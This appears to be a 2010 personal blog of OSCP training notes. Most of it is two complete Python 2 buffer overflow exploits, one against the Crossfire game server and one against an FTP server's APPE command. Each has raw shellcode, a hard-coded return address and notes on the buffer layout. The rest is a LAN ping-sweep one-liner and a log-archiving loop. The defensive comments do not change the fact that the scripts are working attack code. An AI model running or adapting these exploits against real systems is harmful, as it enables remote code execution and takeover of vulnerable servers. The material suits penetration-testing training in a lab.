Sunday, October 10, 2010
----------------------
#!/usr/bin/python
#exploit for crossfire
# Proof-of-concept for a stack buffer overflow in the Crossfire game server
# (TCP 13327): an oversized argument is delivered inside a "setup sound"
# command.  This is a Python 2 script — `print data` is a statement and the
# str literals below are raw bytes; it does not run unchanged on Python 3.
# Reviewer note: the return address is hard-coded, so the script is tied to
# one specific, non-randomized build of the server.  From the defender's
# side, a single "setup sound" request of roughly 4.4 KB made almost entirely
# of 0x41/0x90 filler is far outside normal client traffic and is an easy
# signature for an IDS rule or server-side length check.
import socket, sys
# Target host is the only argument; there is no usage check, so running the
# script without an argument raises IndexError.
host = sys.argv[1]
# 78 bytes
# Payload bytes.  The page does not describe what the shellcode does.
shellcode =("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")
# 4379 bytes
#crash = '\x41' * 4368 + '\x42\x42\x42\x42' + '\x43' * 7
# The commented-out line above is the author's earlier crash pattern: 4368
# bytes of filler, 4 bytes landing on the saved return address, 7-byte tail.
# 0807b8f8 - Indirect Jump
# Same 4379-byte layout as the crash pattern: 100 NOPs + 78-byte shellcode +
# 4190 bytes of filler = 4368 bytes, then 0x0807b8f8 in little-endian byte
# order (the write-up below describes it as a jump through %eax), then the
# 7-byte tail.
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7
# Protocol framing around the command: the leading \x11 byte and the
# trailing '\x90\x00#' are not explained on the page — presumably part of
# the Crossfire client/server message format; verify against the protocol.
buffer = '\x11(setup sound ' + crash + '\x90\x00#'
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,13327))
# Read and print whatever the server sends first, then send the buffer.
data = s.recv(1024)
print data
s.send(buffer)
s.close()
----------------------
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7
\x90 NOPs leading into the shellcode
\x41 a set of As to fill the space until the EIP address
\xf8\xb8\x07\x08 address to the %eax register where the shellcode is stored
\x43 a set of Cs to pad the buffer out to the 4379-byte length of the BOF
Saturday, October 09, 2010
OSCP: shellcode in Win32
---------------------
#!/usr/bin/python
# Proof-of-concept for a stack buffer overflow in an FTP server's APPE
# command handler on a lab host (192.168.11.113, TCP 21).  Python 2 script:
# `print` is used as a statement and the str literals are raw bytes.
# Reviewer note: the return address is hard-coded (the write-up below calls
# it a JMP ESP in USER32.dll), so the script only matches one specific
# library build.  From the defender's side, an APPE argument of 2000 bytes
# is trivially detectable by an argument-length check or an IDS rule on the
# FTP control channel; the server replies are never inspected here either.
import socket
# Initial 2000-byte pattern.  It is overwritten by the crafted buffer below,
# so this assignment is dead — kept as the author left it.
buffer = 'A' * 2000
# Payload bytes: 21 lines of 16 bytes plus a final 8 bytes = 344 bytes.
# The page does not describe what the shellcode does.
shellcode=("\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
"\xa3\x87\x03\x83\xeb\xfc\xe2\xf4\xf5\xc9\x6c\x4e\xe1\x5a\x78\xfc"
"\xf6\xc3\x0c\x6f\x2d\x87\x0c\x46\x35\x28\xfb\x06\x71\xa2\x68\x88"
"\x46\xbb\x0c\x5c\x29\xa2\x6c\x4a\x82\x97\x0c\x02\xe7\x92\x47\x9a"
"\xa5\x27\x47\x77\x0e\x62\x4d\x0e\x08\x61\x6c\xf7\x32\xf7\xa3\x2b"
"\x7c\x46\x0c\x5c\x2d\xa2\x6c\x65\x82\xaf\xcc\x88\x56\xbf\x86\xe8"
"\x0a\x8f\x0c\x8a\x65\x87\x9b\x62\xca\x92\x5c\x67\x82\xe0\xb7\x88"
"\x49\xaf\x0c\x73\x15\x0e\x0c\x43\x01\xfd\xef\x8d\x47\xad\x6b\x53"
"\xf6\x75\xe1\x50\x6f\xcb\xb4\x31\x61\xd4\xf4\x31\x56\xf7\x78\xd3"
"\x61\x68\x6a\xff\x32\xf3\x78\xd5\x56\x2a\x62\x65\x88\x4e\x8f\x01"
"\x5c\xc9\x85\xfc\xd9\xcb\x5e\x0a\xfc\x0e\xd0\xfc\xdf\xf0\xd4\x50"
"\x5a\xf0\xc4\x50\x4a\xf0\x78\xd3\x6f\xcb\x96\x5f\x6f\xf0\x0e\xe2"
"\x9c\xcb\x23\x19\x79\x64\xd0\xfc\xdf\xc9\x97\x52\x5c\x5c\x57\x6b"
"\xad\x0e\xa9\xea\x5e\x5c\x51\x50\x5c\x5c\x57\x6b\xec\xea\x01\x4a"
"\x5e\x5c\x51\x53\x5d\xf7\xd2\xfc\xd9\x30\xef\xe4\x70\x65\xfe\x54"
"\xf6\x75\xd2\xfc\xd9\xc5\xed\x67\x6f\xcb\xe4\x6e\x80\x46\xed\x53"
"\x50\x8a\x4b\x8a\xee\xc9\xc3\x8a\xeb\x92\x47\xf0\xa3\x5d\xc5\x2e"
"\xf7\xe1\xab\x90\x84\xd9\xbf\xa8\xa2\x08\xef\x71\xf7\x10\x91\xfc"
"\x7c\xe7\x78\xd5\x52\xf4\xd5\x52\x58\xf2\xed\x02\x58\xf2\xd2\x52"
"\xf6\x73\xef\xae\xd0\xa6\x49\x50\xf6\x75\xed\xfc\xf6\x94\x78\xd3"
"\x82\xf4\x7b\x80\xcd\xc7\x78\xd5\x5b\x5c\x57\x6b\xf9\x29\x83\x5c"
"\x5a\x5c\x51\xfc\xd9\xa3\x87\x03")
# 77D8AF0A
# Layout: 966 bytes of filler up to the saved return address, 0x77D8AF0A in
# little-endian byte order, 16 bytes of 'C', 16 NOPs, the 344-byte shellcode
# and 654 bytes of 'D' padding — 966+4+16+16+344+654 = 2000 bytes, the same
# length as the initial 'A' * 2000 pattern.
# NOTE: the write-up below quotes '\x90' * 10 for the NOP run; the code
# actually sends 16.
buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 16 + shellcode + '\x44' * 654
print 'Sending evil buffer....'
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.11.113',21))
# Log in as ftp/ftp.  Each recv() drains a server reply, but the responses
# are never checked, so a failed login is not noticed before APPE is sent.
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
# The overflowing command; no reply is read and the socket is never closed.
s.send('APPE ' + buffer + '\r\n')
---------------------
buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 10 + shellcode
'\x41' * 966 to get EIP
overwrite EIP with JMP ESP from USER32.dll
'\x43' * 16 to get ESP
add some NOPs
put the shellcode
OSCP: script for host discovery on a LAN
# for ip in $(seq 1 254); do ping -c 1 192.168.10.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.10.$ip UP" || : ; done
[ $? -eq 0 ] && echo "192.168.10.$ip UP" || :
This is a ternary operator:
if $? (the exit status of the last command) is equal to 0, echo; otherwise do nothing.
Monday, October 04, 2010
HOWTO Zip Provider1 logs in ziplogs/
# cd /var/opt/CPmds-R70/customers/XXXX/CPsuite-R70/fw1/log/
# mkdir ziplogs
# for i in $(ls | cut -d '_' -f1 | sort -u) ; do if [ $(expr match $i '2010') = 4 ]; then echo zipping $i; tar -cf - $i* | gzip -c > $i.tgz; mv $i.tgz ziplogs/.; rm -rf $i*; fi; done
